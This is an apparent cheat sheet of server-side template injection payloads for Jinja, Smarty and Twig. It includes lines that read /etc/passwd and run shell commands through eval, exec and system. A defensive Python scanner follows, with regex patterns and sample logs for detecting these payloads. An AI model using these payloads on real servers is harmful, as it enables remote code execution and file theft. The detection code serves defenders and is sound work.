Basic checks

flask/jinja
__dict__ : the dictionary of attribute name/value pairs of a class or of an object instance
__class__ : returns the class the object is an instance of
__mro__ : returns a tuple of the base classes the object inherits from; methods are resolved in the order of this tuple
__bases__ : returns the base classes the object directly inherits from
// __base__ and __mro__ are both used to locate base classes
__subclasses__ : every new class keeps references to its subclasses; this method returns a list of the references that are still alive
__init__ : the class's initialisation method
__globals__ : a reference to the dictionary holding the function's global variables
Smarty
The following is taken from Smarty SSTI
1. {php}{/php}
Smarty has deprecated the {php} tag and strongly advises against using it. In Smarty 3.1, {php} is only available in SmartyBC.
2. {literal}
{literal} makes a template region output its characters verbatim. It is commonly used to protect JavaScript or CSS on a page from being mis-parsed because of Smarty's delimiters.
So in a PHP 5 environment we can use
<script language="php">phpinfo();</script>
3. {if}
Smarty's {if} conditional is very similar to PHP's if, with a few added features. Every {if} must have a matching {/if}; {else} and {elseif} can also be used. All PHP conditional expressions and functions can be used inside the if, such as ||, or, &&, and, is_array(), and so on.
{if phpinfo()}{/if}
4. getStreamVariable
No longer works in newer versions: {self::getStreamVariable("file:///etc/passwd")}
twig
File read
{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.files.get(1).__construct('/etc/passwd','')}}
{{app.request.files.get(1).openFile.fread(99)}}
RCE
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['cat /etc/passwd']|filter('system')}}
POST /subscribe?0=cat+/etc/passwd HTTP/1.1
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
Web_python_template_injection
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("cat fl4g").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
From there it is just a matter of executing shell commands.
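From the defender's side, the payload families above (Jinja dunder traversal, Smarty {php}/{if func()}, Twig _self.env and filter tricks) leave recognisable traces in web-server access logs. The scanner below is an added example, not code from the original post; its indicator names, regexes and the sample log lines are constructed for illustration.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Indicator patterns for the SSTI payload families listed above (Python dunder
# traversal, Smarty {php}/{if func()}/getStreamVariable, Twig _self.env,
# file_excerpt, filter('system')). The set and its names are an assumption
# for this example, not an official list; extend it for the engines you run.
SSTI_INDICATORS: Dict[str, re.Pattern] = {
    "curly_expr": re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "python_dunder": re.compile(
        r"__(?:class|base|bases|mro|subclasses|init|globals|builtins|import)__"
    ),
    "smarty_php": re.compile(
        r"\{php\}|<script\s+language=[\"']php[\"']|\{if\s+\w+\(.*?\)\}"
        r"|self::getStreamVariable\(",
        re.I,
    ),
    "twig_rce": re.compile(
        r"registerUndefinedFilterCallback|_self\.env\.|file_excerpt\("
        r"|filter\(\s*['\"]?system['\"]?\s*\)",
        re.I,
    ),
}

def scan_request_line(line: str) -> List[str]:
    """Sorted indicator names matching one log line. The line is URL-decoded
    first, since template delimiters usually arrive percent-encoded (%7B%7B)."""
    decoded = unquote_plus(line)
    return sorted(n for n, p in SSTI_INDICATORS.items() if p.search(decoded))

def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(line_index, hits) for every line that triggered at least one indicator."""
    scored = [(i, scan_request_line(l)) for i, l in enumerate(lines)]
    return [(i, hits) for i, hits in scored if hits]

# Constructed sample access-log lines (Apache combined-style; no real hosts).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /hello?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /hello?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /hello?name=%7B%25+for+c+in+%5B%5D.__class__.__base__.__subclasses__()+%25%7D HTTP/1.1" 200 512',
    '10.0.0.3 - - [01/Jan/2024:10:00:04 +0000] "GET /page?tpl=%7Bif+phpinfo()%7D%7B/if%7D HTTP/1.1" 200 9',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /page?tpl=%7B%7B_self.env.registerUndefinedFilterCallback(%22exec%22)%7D%7D HTTP/1.1" 200 9',
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(hits)}")
```

Running it flags lines 1 to 4 of the sample and leaves the benign request alone; a bare `{{7*7}}` probe only trips the delimiter check, while the traversal and engine-specific payloads trip the more specific indicators as well.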